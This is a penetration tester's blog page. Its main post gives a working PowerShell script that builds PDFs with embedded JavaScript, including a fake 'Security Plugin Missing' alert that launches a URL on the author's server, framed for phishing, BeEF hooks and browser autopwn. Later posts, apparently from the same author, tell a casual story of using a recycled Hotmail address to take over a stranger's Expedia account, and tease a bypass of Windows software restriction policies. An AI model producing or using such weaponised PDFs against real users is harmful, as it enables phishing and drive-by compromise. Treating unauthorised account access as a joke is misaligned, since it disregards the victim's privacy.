PowerShell

When trying to solve a problem, I try to use PowerShell.

During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:

Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit

Unfortunately the closest thing was an old Adobe Reader 8.x vintage embedded EXE exploit. I needed to write a payload into a PDF file that would be *interesting* (such as invoking a web browser). After a PDF API refresher, I decided to build it up from simple pieces. The subset of JavaScript that is available is only really supported in the Adobe readers, your-mileage-may-vary with other readers.

app.launchURL(‘http://bluenotch.com/collector.php?ver=’+app.viewerVersion,true);”

After some searching, I found Didier’s Steven’s work, realizing I should have looked there first. Didier has PDFid.py for summary analysis and mPDF.py to build it. I wanted to go the PowerShell route, however; all I could find is PDFSharp used for PowerShell print-to-PDF examples. I was surprised that nobody has published something similar to this.

Between a sample PDFSharp cmdlet for merging PDFs (http://mikepfeiffer.net/2010/03/how-to-merge-pdf-files-using-powershell-and-pdfsharp/) and this example to create JavaScript Elements in PDF in .Net (http://www.vo1dmain.info/pdfsharp-howto-inject-javascript-into-pdf-autoprinting-functionality), I have enough to work out a PowerShell solution. I still have Adobe’s JavaScript API specification for reference as well (http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.pdf).

A preliminary test script using the ideas above:

[string]$js = “app.alert(‘boom goes the reader ‘+app.reader);”,
[string]$msg = “Hello JS”,
[string]$filename = “C:\PDF\helloJS.pdf”

Add-Type -Path C:\pdf\PdfSharp-WPF.dll

$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $js
$doc.info.Creator = “@jimshew”
$page = $doc.AddPage()

$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements[“/S”] = New-Object PdfSharp.Pdf.PdfName (“/JavaScript”)
$dictjs.Elements[“/JS”] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
$doc.Internals.AddObject($dictjs)

$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString(“EmbeddedJS”)

$dict.Elements[“/Names”] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)

$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements[“/JavaScript”] = $dict.Reference
$doc.Internals.Catalog.Elements[“/Names”] = $dictgroup

$doc.Save($filename)

On open of the PDF (modern reader with no settings changes ):

blogpdfjspopup

Great, now we can taunt the victim, but what about something more interesting, like making external requests?

$js = “app.alert(‘Security Plugin Missing, Launching installer’);app.LaunchURL(‘http://bluenotch.com/pwn.php’,true);”
$msg = “Security Plugin FAIL”,
$filename = “C:\PDF\helloHTTP.pdf”

blogpdfjspluginwarning

Followed by:

blogpdfredirectallow

So it’s easy to see how we can leverage this in a phishing or social engineering attack. In one of the recent assessments, the web portal that housed the PDFs was whitelisted so it didn’t even prompt for the URL redirect! Now it’s ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.

I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see work by Frédérick Raynal and Guillaume Delugré  below).

I’ll be turning this into a proper PowerShell module soon, (assuming my battery holds out during the next series of flights). For more info along PDF hijinks, you may want to check out:

Origami – a framework for generating malicious PDFs:
http://www.security-labs.org/fred/docs/pacsec08/pacsec08-fr-gd-full.pdf
https://code.google.com/p/origami-pdf/

Online PDF analyzer:
http://wepawet.iseclab.org/index.php

You probably want to check what app.launchURL destinations are already allowed, here is mine after checking the remember box on the HelloHTTP.pdf :

[HKEY_USERS\S-1-5-21-3430783995-1949563973-3828160469-1001\Software\Adobe\Acrobat Reader\11.0\TrustManager\cDefaultLaunchURLPerms]

“tHostPerms”=”version:2|akeo.ie:2|amazon.com:2|bluenotch.com:2|cdw.com:2|crucial.com:2″

+ | jimshew |

Summer of 1999

fire exit

I was living in southern Idaho back then, which meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie and quickly headed to full time work there.  Yes, hours of fun, shows, tours, etc. But still needed California vacation time. So yes, 60-80 hours a week in a closet size studio and the need to visit my home, Southern California was a priority. Granted Idaho has great white water rivers and white powder snow capped mountains, but still – surf, sand, and retail sunshine were missing.

The gateway medium?  Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet.  So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger – IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999, okay so not everyone had Hotmail yet – mostly Yahoo or AOL and Microsoft recently acquired Hotmail.  I still had a difficult time getting my third choice account name.  So brainbending – one simple combo was available! Full first name and last initial. Two minutes later done registering to welcome email arrives. Step two – I start to book Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well despite me not caring about the why it was a registered email user account < look, I had late nights, not yet a daily straight up espresso drinker, and really did not think much of it. It was highly likely and logical that I started an account process and forgot to finish one late night > I waited – The Password emailed to me… Some vacationy type password. Again, highly likely I made it that password – no red flag. Odd right? But true. The password was five characters long. High Five.  I  think about a month later, I forgot the password … Reset and added a “1” Good job? Yes this means more out of town trips were booked. 

A couple months later I get an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much >  And I think we even might of mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name and he emailed me several years back again just to say hi … Ahem or try to get his email back.  I just looked him up on LinkedIn – Senior Infosec Eengineer, now lives in Utah.  Look it was free Risk-game type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.”  + | shew | 

restauration beire

Same year, same station, different channel role – It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest. Or a claim that their password was weak and they should change it …+ | jimshew |

Cybersecurity thoughts on Presidents’ Day

In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI).  Recently, the Obama Administration released several notices on cybersecurity, below is an Executive Order.

By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows: 

Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.

Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari

It is of note, during this White House Summit held at Stanford University, CEOs from Google, Yahoo, Facebook – absent. Tim Cook, Apple CEO, attended.

Americano LatteSMALL TALK  On a coffee + laptop observational side note:  I was at a coffeebar on Saturday and there were only Macs everywhere.  Yes, I did the 360 check while waiting for my Americano-latte.  It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which can we agree we love / hate the emailed receipt?!).  So apparently, if I bring my ThinkPad, I might need to trek down to other coffeeshop down the street – they use an older school Point of Sale system and have the most amazing hazelnut gelato.  + | shew |

Five Year Plan

SMALL TALK    I’m working on my five year plan, just trying to figure out the font.  < that’s a line in the pilot episode of Chuck >  I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad).   +  | shew |

fiveyearplanSince we’re on a television tangent … Just saw esxi console on Blacklist, now I *know* it’s a documentary. + | james.shew |

Welcome

stumptown at sidecarNERD TALK  requires more espresso.  And since it’s late, ahem early am and we are up wrestling technical fun time warps, I’ll save my eloquent thoughts for the mid morning first jumpstart shot of caffeine.  Thank you Sidecar, Stumptown, Rose Park, and even in the pinch, Starbucks for the assists.

+  | shew |

UPDATE 15.48 |  A Nice SRP Circumventing Trick | During a recent penetration test, my goal was to smuggle data around out of a hardened virtual application.  This particular test, included a vApp designed to restrict everything not needed to display and edit a Word document.  Between Group Policy Objects and Software Restriction Policies, there were practically no third-party applications available to manipulate, and most Windows internal programs were either removed or hijacked by a Digital Rights Management DLL.

Continue reading